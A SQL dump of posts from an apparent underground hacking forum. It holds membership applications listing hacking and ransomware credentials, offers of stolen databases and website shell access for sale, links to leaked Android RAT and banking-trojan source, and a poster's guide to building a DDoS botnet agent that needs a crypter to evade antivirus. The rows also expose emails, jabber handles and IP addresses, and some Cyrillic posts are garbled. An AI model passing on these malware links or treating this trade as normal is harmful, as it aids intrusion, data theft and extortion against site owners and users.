(2763, 2299, 0, 'Invite', 2, 'sAv', 1442755750, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: sAv[/COLOR][/SIZE]\n[b]Age:[/b] 21\n[b]jabber:[/b] sav@swissjabber.org\n[b]Comments:[/b] hello,\r\n\r\ni\'ve done many\r\nthings and have\r\nexperience in many\r\ndifferent fields\r\nsuch as REing,\r\nanything that\'s\r\nkernel land based,\r\ncurrently learning\r\nmips and have a ton\r\nof experience in\r\nx86/x64 (some), have\r\na lot of dbs to\r\nshare if this is the\r\ntype of thing you\'re\r\nafter (i.e google\r\nplex tv forum hack),\r\ni\'m also the co\r\nfounder of a project\r\ncalled coinvault\r\nwhich is a\r\nransomware project\r\n(kaspersky done a\r\nwrite up on this\r\nproject because of a\r\nfail which resulted\r\nin the danish police\r\nseizing a box and\r\nmanaging to extract\r\nall the keys), i am\r\nalso heavily\r\ninvolved in\r\ndifferent types of\r\nnetworking and\r\nexploit techniques\r\n(i.e vlan hopping) \r\n\r\ni think i would be a\r\nhalf decent figure\r\nto the community\r\nbecause i have a\r\nvast amount of\r\nknowledge to share\r\nand can also provide\r\ncontent \r\n\r\ni have written many\r\ntutorials that i\'d\r\nbe willing to share\r\n(i.e aslr\r\nbruteforcing,\r\nret2libc, different\r\npayload delivery\r\ntechniques - heap\r\nspraying and also\r\nexploit techniques\r\nsuch as pop pop ret,\r\nnopsled) \r\n\r\nselling myself isn\'t\r\nsomething i\'m good\r\nat but i\'m\r\ndefinitely not a\r\nretard\r\n\r\nsAv .', 1, 0, '141.101.97.247', 0, 1, 0, 0, 0),
(2762, 2298, 0, 'Invite', 2, 'Loladr', 1442751871, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Loladr[/COLOR][/SIZE]\n[b]Age:[/b] 26\n[b]jabber:[/b] loladr\n[b]Comments:[/b] .', 1, 0, '162.158.114.221', 0, 1, 0, 0, 0),
(2761, 2297, 0, 'Invite', 2, 'name', 1442746754, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: name[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] ok ok ok ok ok .', 1, 0, '141.101.96.251', 0, 1, 0, 0, 0),
(2760, 2296, 0, 'Invite', 2, 'D9', 1442746155, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: D9[/COLOR][/SIZE]\n[b]Age:[/b] 30\n[b]jabber:[/b] djd9@fuckav.in\n[b]Comments:[/b] The most important\r\nfield. Here you must\r\nspecify the service\r\narea of knowledge\r\nrelated to IT, their\r\nskills in different\r\nareas, their\r\nachievements,\r\nreleases and\r\nprofiles on famous\r\nit-portals, the\r\npotential usefulness\r\nof the project and\r\nso on. A small\r\ndescription of\r\nyourself is\r\nencouraged. You can\r\nalso leave a jabber\r\nand other\r\nalternative\r\naddresses for\r\ncommunication, in\r\nshort, everything\r\nthat you see fit to\r\nbring to our\r\nattention. The\r\nminimum length of\r\n200 characters,\r\nmaximum 4,000.\r\n.', 1, 0, '162.158.114.202', 0, 1, 0, 0, 0),
(2845, 1830, 2837, 'ropertus', 33, '', 1443308276, 'Congratulations :)', 1, 0, '173.245.53.201', 0, 1, 0, 0, 0),
(2844, 2378, 0, 'Invite', 2, 'nickname', 1443288935, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] /.', 1, 0, '141.101.80.252', 0, 1, 0, 0, 0),
(2842, 2377, 0, 'w0rm', 100, 'dotabooster.com', 1443200935, 'dotabooster.com db for sale.\r\n50$', 1, 0, '141.101.80.137', 0, 1, 0, 0, 0),
(2753, 2290, 0, 'Invite', 2, 'aaj6', 1442706380, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: aaj6[/COLOR][/SIZE]\n[b]Age:[/b] 16\n[b]jabber:[/b] \n[b]Comments:[/b] .', 1, 0, '162.158.90.111', 0, 1, 0, 0, 0),
(2754, 2291, 0, 'Invite', 2, 'aaj6', 1442706436, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: aaj6[/COLOR][/SIZE]\n[b]Age:[/b] 16\n[b]jabber:[/b] jabber\n[b]Comments:[/b] trash.ezes@yandex.ru.', 1, 0, '162.158.90.111', 0, 1, 0, 0, 0),
(2755, 2239, 2702, 'ropertus', 33, '', 1442711247, 'Good to see this back up!', 1, 0, '141.101.87.13', 0, 1, 0, 0, 0),
(2756, 2292, 0, 'Invite', 2, 'fgddge', 1442718133, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: fgddge[/COLOR][/SIZE]\n[b]Age:[/b] cdwwww\n[b]jabber:[/b] gegdggd\n[b]Comments:[/b] .', 1, 0, '173.245.53.107', 0, 1, 0, 0, 0),
(2757, 2293, 0, 'Invite', 2, 'LukcyRab', 1442739549, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: LukcyRab[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '141.101.104.4', 0, 1, 0, 0, 0),
(2758, 2294, 0, 'Invite', 2, 'LukcyRab', 1442739590, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: LukcyRab[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '141.101.104.4', 0, 1, 0, 0, 0),
(2759, 2295, 0, 'Invite', 2, 'deadeye', 1442743557, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: deadeye[/COLOR][/SIZE]\n[b]Age:[/b] 39\n[b]jabber:[/b] deadeye@xmpp.ru\n[b]Comments:[/b] New arrival at Sysfuck Labs, but long time xoc \r\nadvisor. My background is mostly in 36 bit word \r\ncomputing and char encodings that is being used at \r\nthis moment as I am working update some tools for \r\nhiding in plain site and covcom. i used to ask help \r\nfrom a worm or werm about my printers and to see the \r\nhandle making a point to stop and say hello every two \r\nother three times..', 1, 0, '108.162.236.109', 0, 1, 0, 0, 0),
(2752, 2289, 0, 'Invite', 2, 'mmmmmmm9999', 1442702293, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: mmmmmmm9999[/COLOR][/SIZE]\n[b]Age:[/b] 18\n[b]jabber:[/b] \n[b]Comments:[/b] mmmmmmmnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn\r\nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn\r\nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn\r\nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn\r\nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn\r\nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn\r\nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn\r\nnnnnnnnnnnnnnnnnnnnnnnnn.', 1, 0, '141.101.64.167', 0, 1, 0, 0, 0),
(2741, 2278, 0, 'Invite', 2, 'maktorin', 1442689256, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: maktorin[/COLOR][/SIZE]\n [b]Age:[/b] 33\n [b]Comments:[/b] qawsxxxcvrrrtggghjn.', 1, 0, '141.101.99.126', 0, 1, 0, 0, 0),
(2742, 2279, 0, 'Invite', 2, 'bat9user', 1442693266, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: bat9user[/COLOR][/SIZE]\n [b]Age:[/b] 87\n [b]Comments:[/b] HACK.', 1, 0, '141.101.88.4', 0, 1, 0, 0, 0),
(2743, 2280, 0, 'Invite', 2, 'bat9user', 1442693307, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: bat9user[/COLOR][/SIZE]\n [b]Age:[/b] 87\n [b]Comments:[/b] HACK.', 1, 0, '141.101.88.135', 0, 1, 0, 0, 0),
(2740, 2277, 0, 'Invite', 2, 'T0fe1', 1442685870, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: T0fe1[/COLOR][/SIZE]\n [b]Age:[/b] 30\n [b]Comments:[/b] .', 1, 0, '162.158.91.136', 0, 1, 0, 0, 0),
(2739, 2276, 0, 'Invite', 2, 'test', 1442680894, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: test[/COLOR][/SIZE]\n [b]Age:[/b] test\n [b]Comments:[/b] test2.', 1, 0, '162.158.90.112', 0, 1, 0, 0, 0),
(2734, 2271, 0, 'Invite', 2, 'Nurba', 1442671151, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Nurba[/COLOR][/SIZE]\n [b]Age:[/b] 21\n [b]Comments:[/b] .', 1, 0, '141.101.92.174', 0, 1, 0, 0, 0),
(2735, 2272, 0, 'Invite', 2, 'AndryOsminin', 1442673506, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: AndryOsminin[/COLOR][/SIZE]\n [b]Age:[/b] 21\n [b]Comments:[/b] .', 1, 0, '162.158.108.197', 0, 1, 0, 0, 0),
(2736, 2273, 0, 'Invite', 2, 'crazystik', 1442675073, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: crazystik[/COLOR][/SIZE]\n [b]Age:[/b] 20\n [b]Comments:[/b] .', 1, 0, '162.158.90.250', 0, 1, 0, 0, 0),
(2737, 2274, 0, 'Invite', 2, 'Romajkee', 1442677174, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Romajkee[/COLOR][/SIZE]\n [b]Age:[/b] 19\n [b]Comments:[/b] .', 1, 0, '141.101.92.183', 0, 1, 0, 0, 0),
(2738, 2275, 0, 'Invite', 2, 'Zhidyaev', 1442680431, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Zhidyaev[/COLOR][/SIZE]\n [b]Age:[/b] 25\n [b]Comments:[/b] .', 1, 0, '141.101.98.227', 0, 1, 0, 0, 0),
(2733, 2270, 0, 'Invite', 2, 'svyatoal', 1442665349, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: svyatoal[/COLOR][/SIZE]\n [b]Age:[/b] 21\n [b]Comments:[/b] .', 1, 0, '141.101.104.45', 0, 1, 0, 0, 0),
(2732, 2269, 0, 'Invite', 2, 'nyxa', 1442662987, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nyxa[/COLOR][/SIZE]\n [b]Age:[/b] 18\n [b]Comments:[/b] IT C++ , C#.', 1, 0, '162.158.93.16', 0, 1, 0, 0, 0),
(2731, 2268, 0, 'Invite', 2, 'citizenx', 1442658373, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: citizenx[/COLOR][/SIZE]\n [b]Age:[/b] 19\n [b]Comments:[/b] dir..', 1, 0, '141.101.98.77', 0, 1, 0, 0, 0),
(2730, 2267, 0, 'Invite', 2, 'Amir aka Temur', 1442649812, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Amir aka Temur[/COLOR][/SIZE]\n [b]Age:[/b] 26\n [b]Comments:[/b] I am one of the\r\nfounders of hacker\r\ngroups in Uzbekistan\r\nunder the whole of\r\nthe clone security\r\nbreaches magazine -\r\nhttps://twitter.com/clonesecurity.\r\nMy friend had\r\nalready left the\r\ngroup hack afraid\r\nspecial services but\r\nI want to continue\r\nthe activity.\r\ndrug@rusrav.uz\r\nE-Mail.', 1, 0, '162.158.91.222', 0, 1, 0, 0, 0),
(2729, 2266, 0, 'Invite', 2, 'liteh', 1442647827, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: liteh[/COLOR][/SIZE]\n [b]Age:[/b] \n [b]Comments:[/b] maximus.', 1, 0, '162.158.91.123', 0, 1, 0, 0, 0),
(2728, 2265, 0, 'Invite', 2, 'nickname', 1442615581, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n [b]Age:[/b] age\n [b]Comments:[/b] ßðрýø òþ÷ьüøтõ ò рðñþту\r\n.', 1, 0, '162.158.91.120', 0, 1, 0, 0, 0),
(2727, 2264, 0, 'Invite', 2, 'nickname', 1442608074, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n [b]Age:[/b] age\n [b]Comments:[/b] .', 1, 0, '173.245.53.146', 0, 1, 0, 0, 0),
(2726, 2263, 0, 'Invite', 2, 'koshevsky', 1442605962, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: koshevsky[/COLOR][/SIZE]\n [b]Age:[/b] 18\n [b]Comments:[/b] .', 1, 0, '198.41.242.195', 0, 1, 0, 0, 0),
(2725, 2262, 0, 'Invite', 2, 'ynk', 1442605632, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: ynk[/COLOR][/SIZE]\n [b]Age:[/b] 25\n [b]Comments:[/b] i\'m seller..', 1, 0, '141.101.98.24', 0, 1, 0, 0, 0),
(2724, 2261, 0, 'Invite', 2, 'nickname', 1442603835, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n [b]Age:[/b] age\n [b]Comments:[/b] .', 1, 0, '162.158.90.185', 0, 1, 0, 0, 0),
(2723, 2260, 0, 'Invite', 2, 'Chex', 1442601382, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Chex[/COLOR][/SIZE]\n [b]Age:[/b] 33\n [b]Comments:[/b] .', 1, 0, '162.158.90.199', 0, 1, 0, 0, 0),
(2722, 2259, 0, 'Invite', 2, 'Chex', 1442600723, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Chex[/COLOR][/SIZE]\n [b]Age:[/b] 35\n [b]Comments:[/b] .', 1, 0, '162.158.90.199', 0, 1, 0, 0, 0),
(2721, 2258, 0, 'Invite', 2, 'nickname', 1442599899, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n [b]Age:[/b] age\n [b]Comments:[/b] .', 1, 0, '141.101.104.151', 0, 1, 0, 0, 0),
(2720, 2257, 0, 'Invite', 2, 'Dasfeer', 1442599739, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Dasfeer[/COLOR][/SIZE]\n [b]Age:[/b] 19\n [b]Comments:[/b] .', 1, 0, '141.101.104.151', 0, 1, 0, 0, 0),
(2719, 2256, 0, 'Invite', 2, 'Chex', 1442599107, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Chex[/COLOR][/SIZE]\n [b]Age:[/b] 99\n [b]Comments:[/b] .', 1, 0, '162.158.90.199', 0, 1, 0, 0, 0),
(2715, 2252, 0, 'Invite', 2, 'nickname', 1442592266, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n [b]Age:[/b] age\n [b]Comments:[/b] .', 1, 0, '162.158.90.178', 0, 1, 0, 0, 0),
(2716, 2253, 0, 'Invite', 2, 'kjk', 1442594552, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: kjk[/COLOR][/SIZE]\n [b]Age:[/b] \n [b]Comments:[/b] j.', 1, 0, '162.158.114.228', 0, 1, 0, 0, 0),
(2717, 2254, 0, 'Invite', 2, 'Upir', 1442595269, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: UPIR[/COLOR][/SIZE]\n [b]Age:[/b] 20\n [b]Comments:[/b] .', 1, 0, '162.158.90.247', 0, 1, 0, 0, 0),
(2718, 2255, 0, 'Invite', 2, 'chip3ra', 1442596340, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: chip3ra[/COLOR][/SIZE]\n [b]Age:[/b] 34\n [b]Comments:[/b] Rod dejtelnosti: injecty, ATS, tokenki\r\n\r\nJabber: chip3ra@jabb3r.de\r\nJabber: chip3ra@exploit.im\r\n\r\nAccounts:\r\n1. Korovka - member.php?u=2189\r\n2. Omerta - member.php?u=30602\r\n3. Verified - member.php?u=42556\r\n4. Exploit - index.php?showuser=58008.', 1, 0, '162.158.108.191', 0, 1, 0, 0, 0),
(2714, 2251, 0, 'Invite', 2, 'Jay', 1442588981, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Jay[/COLOR][/SIZE]\n [b]Age:[/b] 41\n [b]Comments:[/b] Tan.', 1, 0, '162.158.91.180', 0, 1, 0, 0, 0),
(2713, 2250, 0, 'Invite', 2, 'sdfogsdofg45', 1442588547, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: sdfogsdofg45[/COLOR][/SIZE]\n [b]Age:[/b] 20\n [b]Comments:[/b] .', 1, 0, '141.101.92.208', 0, 1, 0, 0, 0),
(2706, 2243, 0, 'Invite', 2, 'Sawyer', 1442583758, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Sawyer[/COLOR][/SIZE]\n [b]Age:[/b] 20\n [b]Comments:[/b] .', 1, 0, '162.158.91.246', 0, 1, 0, 0, 0),
(2707, 2244, 0, 'Invite', 2, '0R1en', 1442584017, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: 0R1en[/COLOR][/SIZE]\n [b]Age:[/b] 25\n [b]Comments:[/b] .', 1, 0, '108.162.220.77', 0, 1, 0, 0, 0),
(2709, 2246, 0, 'Invite', 2, 'Clooney', 1442584933, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Clooney [/COLOR][/SIZE]\n [b]Age:[/b] 27\n [b]Comments:[/b] .', 1, 0, '162.158.91.221', 0, 1, 0, 0, 0),
(2710, 2247, 0, 'Invite', 2, 'nickname', 1442585792, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n [b]Age:[/b] age\n [b]Comments:[/b] .', 1, 0, '141.101.75.19', 0, 1, 0, 0, 0),
(2711, 2248, 0, 'Invite', 2, 'temaniger', 1442585982, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: temaniger[/COLOR][/SIZE]\n [b]Age:[/b] 18\n [b]Comments:[/b] .', 1, 0, '141.101.98.228', 0, 1, 0, 0, 0),
(2712, 2249, 0, 'Invite', 2, 'ssdtux', 1442586955, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: ssdtux[/COLOR][/SIZE]\n [b]Age:[/b] 111\n [b]Comments:[/b] I am a sec engineer from ukraine. My job - planning \r\nsecurity requirements and measures, forensics and \r\nmalware analysis, PoC development,software audit, \r\nresearch and development (Linux, FreeBSD, Android)\r\npenetration and stress testing, DDoS prevention, \r\nAPT, intelligence and cyber warfare, Network security \r\n(Cisco, Juniper, MikroTik ) Enjoy working in a position \r\nthat will engage my skills, knowledge and interests \r\nparticularly within the information security industry.\r\nssdtux@gmail.com.', 1, 0, '162.158.114.247', 0, 1, 0, 0, 0),
(2841, 2376, 0, 'Invite', 2, 'Robotxobot', 1443189792, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Robotxobot[/COLOR][/SIZE]\n[b]Age:[/b] 24\n[b]jabber:[/b] robotxobot@jabber.allnorilsk.ru\n[b]Comments:[/b] I am the lord of the galaxy!!!.', 1, 0, '141.101.80.185', 0, 1, 0, 0, 0),
(2839, 2374, 0, 'Invite', 2, 'ematana', 1443136238, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: ematana[/COLOR][/SIZE]\n[b]Age:[/b] 21\n[b]jabber:[/b] professor\n[b]Comments:[/b] i am interesting hacking.', 1, 0, '141.101.105.58', 0, 1, 0, 0, 0),
(2837, 1830, 2824, 'cyberbuddha', 186, '', 1443124566, 'gratz friend', 1, 0, '108.162.221.140', 0, 1, 0, 0, 0),
(2836, 2373, 0, 'Invite', 2, 'cyberbuddha', 1443123275, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: cyberbuddha[/COLOR][/SIZE]\n[b]Age:[/b] 21\n[b]jabber:[/b] cyberbuddha@hot-chilli.net\n[b]Comments:[/b] I have been self teaching myself Linux Administration \r\nand Active Directory in the last 2 years and made \r\nlogical improvements in a short amount of time and I \r\nlove w0rm\'s work it inspired me to be where I am now. \r\nCuriosity is a gift and a curse. .', 1, 0, '108.162.221.140', 0, 1, 0, 0, 0),
(2702, 2239, 0, 'admin', 1, 'w0rm.ws Jabber', 1442485139, '[CENTER]w0rm.ws jabber server online!\n\nFor registration please contact [email]admin@w0rm.ws[/email][/CENTER]', 1, 0, '173.245.53.64', 0, 1, 0, 0, 0),
(2703, 2240, 0, 'Invite', 2, '#ziga', 1442583324, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: #ziga[/COLOR][/SIZE]\n [b]Age:[/b] 23\n [b]Comments:[/b] .', 1, 0, '141.101.92.199', 0, 1, 0, 0, 0),
(2704, 2241, 0, 'Invite', 2, '#ziga', 1442583393, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: #ziga[/COLOR][/SIZE]\n [b]Age:[/b] 23\n [b]Comments:[/b] i am it specialist.', 1, 0, '162.158.115.119', 0, 1, 0, 0, 0),
(2698, 1335, 2695, 'hunter_exploitkit', 172, '', 1442097667, 'Sorry, the file you requested is not available.\r\n\r\nPossible reasons include: \r\n\r\n- File date limit has expired. \r\n- File was not successfully uploaded. \r\n\r\nIt is not possible to restore the file. Please contact the uploader and ask them to upload the file again.', 1, 0, '162.158.91.183', 0, 1, 0, 0, 0),
(2695, 1335, 1476, 'st1x0', 171, '', 1442002950, 'можно ссылку?', 1, 0, '141.101.104.33', 0, 1, 0, 0, 0),
(2692, 1861, 2691, '*Hash*', 164, '', 1440888161, 'скриншота щас под рукой нет, суть в том что я его запускаю и пишет что для запуска не хватает dll файла, я его скачиваю добавляю, снова вылазит при запуске ошибка уже другого плана', 1, 0, '162.158.90.223', 0, 1, 0, 0, 0),
(2691, 1861, 2690, 'hunter_exploitkit', 172, '', 1440851863, 'NO , this Framework Compiled by Visual Studio and Written by Visual C++ and server side by php with mysql server\r\n\r\nfor builder run builder on cmd\r\nin first you must setup server side php on host \r\nfor example\r\n[url]http://127.0.0.1/botnet/indes.php?task=ok[/url]\r\nafter run builder you enter this url to builder\r\n\r\nbuilder load stub insider + your url and generate exe 455 kb\r\nmaybe for run builder want msvcp100.dll becasue this source compiled by Visual studio 2010\r\n\r\nif you have problem take screen shot and show me\r\nI run this on servfer and run agent , Not bad not Good !\r\nfor Ddos attack I thinks Good \r\nthis exe take signature by all AV\r\nfor use this you must have Power Cryptor', 1, 0, '162.158.31.114', 0, 1, 0, 0, 0),
(2690, 1861, 2689, 'st1x0', 171, '', 1440713832, 'фреймворк стоит? .net', 1, 0, '141.101.98.164', 0, 1, 0, 0, 0),
(2772, 1862, 2312, 'w0rm', 100, '', 1442790637, '[url]http://pravogolosa.net/[/url] - shell or sql\r\n500 usd', 1, 0, '162.158.90.112', 0, 1, 0, 0, 0),
(2689, 1861, 2324, '*Hash*', 164, '', 1440708007, 'обьясните мне малограмотному как запустить билдер ? дллку скачал добавил и в папку с прогой и в систем. толку 0 щас вылазит другая ошибка.', 1, 0, '162.158.90.200', 0, 1, 0, 0, 0),
(2773, 2307, 0, 'Invite', 2, 'nickname', 1442813894, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '141.101.105.221', 0, 1, 0, 0, 0),
(2774, 2308, 0, 'Invite', 2, 'zoom', 1442816534, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: zoom[/COLOR][/SIZE]\n[b]Age:[/b] 19\n[b]jabber:[/b] andmot@alpha-labs.net\n[b]Comments:[/b] Op. System: linux,\r\nkali, tails, debian.\r\nComp.: gcc, msvc,\r\nLang.: c++/c, php,\r\nsql mysql, c#,\r\nTehnol.: qt, .net,\r\njs, flash.\r\nProg.:wireshark,\r\nkvm, aircrack,\r\nmetasploit. Priv.:\r\notr, gpg, vpn,\r\nproxy. Reverse\r\nengineering.', 1, 0, '108.162.229.207', 0, 1, 0, 0, 0),
(2775, 2309, 0, 'Invite', 2, 'ketniggo', 1442819244, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: ketniggo[/COLOR][/SIZE]\n[b]Age:[/b] 24\n[b]jabber:[/b] nettylin@xmpp.jp\n[b]Comments:[/b] Programmirovnie C\r\n++, web pages,\r\ninterested in\r\nmeasures and methods\r\nof Information\r\nSecurity, an\r\nanonymous method of\r\npenetration into the\r\nprotected network..', 1, 0, '141.101.98.220', 0, 1, 0, 0, 0),
(2776, 2310, 0, 'Invite', 2, 'justfrorgetaboutme', 1442825199, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: justfrorgetaboutme[/COLOR][/SIZE]\n[b]Age:[/b] 99\n[b]jabber:[/b] justforgetboutme@jabber.com\n[b]Comments:[/b] IT.', 1, 0, '162.158.90.205', 0, 1, 0, 0, 0),
(2777, 2311, 0, 'Invite', 2, 'nickname', 1442833259, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '141.101.104.71', 0, 1, 0, 0, 0),
(3001, 2488, 2998, 'tdss', 173, '', 1455912109, '[QUOTE=Scrack;2998]I\'m looking for something new and also leaked code[/QUOTE]\nAndrorat: [url]https://upload.freehacks.ru/0WfVGK[/url]\nDendroid: [url]https://github.com/nyx0/Dendroid[/url]\niBanking: [url]https://upload.freehacks.ru/xd2y8B[/url]\nDroidJack: [url]https://upload.freehacks.ru/5Cejj6[/url]', 1, 0, '173.245.54.190', 0, 1, 0, 0, 0),
(2862, 2387, 0, 'Invite', 2, 'mrsalvadore', 1443389868, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: mrsalvadore[/COLOR][/SIZE]\n[b]Age:[/b] 25\n[b]jabber:[/b] mrsalvadore@exploit.im\n[b]Comments:[/b] Ã¥ðù, ÑÂðü ýð exploit\r\nÑÂøöу ø ýð ôруóøх\r\nÑÂøôõû.. ýþ тþûúу 0\r\nøýфð òÑÂѠôрõòýÑÂѠð\r\nтðü óôõ ûюôø тðü\r\nÿрþñûõüы.. ð òÑÂõ чтþ\r\nÿøшут ÿþÑÂутø þôýþ ø\r\nтþöõ.. üþöõт у òðÑÂ\r\nчтþ õÑÂть\r\nøýтõрõÑÂÑÂýþõ.. ôð\r\nûюôø üþöõт\r\nýþрüðûьýыõ...', 1, 0, '162.158.114.229', 0, 1, 0, 0, 0),
(2900, 1026, 1029, 'gago21', 211, '', 1446224904, 'Dead Link Bro :(', 1, 0, '173.245.53.71', 0, 1, 0, 0, 0),
(2901, 1015, 2267, 'ponypwpw', 266, '', 1446419208, 'ðº ð½ðµðºð¾ñ‚ð¾ñ€ñ‹ð¼ ñ„ð°ð¹ð»ð°ð¼ ð¿ñ€ð¾ñÂð¸ñ‚ ð¿ð°ñ€ð¾ð»ñŒ, ð½ðµ ð¿ð¾ð´ñÂðºð°ð¶ðµñ‚ðµ? \r\nð¸ ðµñÂð»ð¸ ðµñÂñ‚ñŒ ð²ð¾ð·ð¼ð¾ð¶ð½ð¾ñÂñ‚ñŒ ð¾ð±ð½ð¾ð²ð¸ñ‚ðµ ð¿ð¾ð¶ð°ð»ñƒð¹ñÂñ‚ð° ñÂñÂñ‹ð»ðºñƒ ð²ð¾ ð²ñ‚ð¾ñ€ð¾ð¼ ð¿ð¾ñÂñ‚ðµ', 1, 0, '162.158.90.143', 0, 1, 0, 0, 0),
(2865, 2346, 2801, 'w0rm', 100, '', 1443713624, 'updates:\nbelegit.net \nOpenSC.ws \nFuckAV.ru\nSec4ever\n\n[email]root@w0rm.ws[/email]', 1, 0, '141.101.80.166', 0, 1, 0, 0, 0),
(2878, 2392, 0, 'w0rm', 100, 'forum-seo.net', 1444660755, 'Fresh & full forum dump.\n500USD.\n[email]root@w0rm.ws[/email]', 1, 0, '141.101.80.166', 0, 1, 0, 0, 0),
(2892, 1862, 2891, 'Psych0tr1a', 11, '', 1445622989, '[QUOTE=Psych0tr1a;2891]what u want for xss ?[/QUOTE]\r\n\r\nxss+clickjacking PoC exploit ;)', 1, 0, '162.158.91.146', 0, 1, 0, 0, 0),
(2890, 1862, 2772, 'w0rm', 100, '', 1445622220, '[url]http://verification420.com/[/url]\r\n[url]https://indicaonline.com/[/url]\r\n[url]https://verify.greenlifemedical.com/[/url]', 1, 0, '141.101.81.13', 0, 1, 0, 0, 0),
(2891, 1862, 2312, 'Psych0tr1a', 11, '', 1445622891, '[QUOTE=w0rm;2312]*.salesforce.com[/QUOTE]\r\n\r\nwhat u want for xss ?', 1, 0, '162.158.91.146', 0, 1, 0, 0, 0),
(2893, 1862, 2892, 'w0rm', 100, '', 1445629858, 'я если честно уже не вспомню чей заказ, запилю рассрочку в джаббер надеюсь тот кто искал отзавется.', 1, 0, '141.101.81.13', 0, 1, 0, 0, 0),
(2894, 2397, 0, 'w0rm', 100, 'Megafon', 1445771564, 'Начинаю выкладывать фаилы с нашумевшего взлома:\r\ntjournal.ru/p/megafon-w0rm-hack-dump\r\n\r\npart 1 : [URL=\"https://drive.google.com/open?id=0B0ox2xf_0TMjR1ZjU1A0ZURUelU\"]link[/URL]', 1, 0, '141.101.81.13', 0, 1, 0, 0, 0),
(2895, 2346, 2865, 'dark001', 178, 'About verified', 1445778141, 'Sorry for posting something not related to the initial post', 1, 0, '141.101.104.127', 0, 1, 0, 0, 0),
(2898, 2397, 2894, 'Kingbeef', 3, '', 1445878300, 'Бро, напиши мне.', 1, 0, '162.158.91.146', 0, 1, 0, 0, 0),
(2896, 2346, 2895, '123', 41, '', 1445786886, 'Можно объеденить все базы в одну, и сделать поиск людей по мылам, жабам, и прочее', 1, 0, '162.158.91.129', 0, 1, 0, 0, 0),
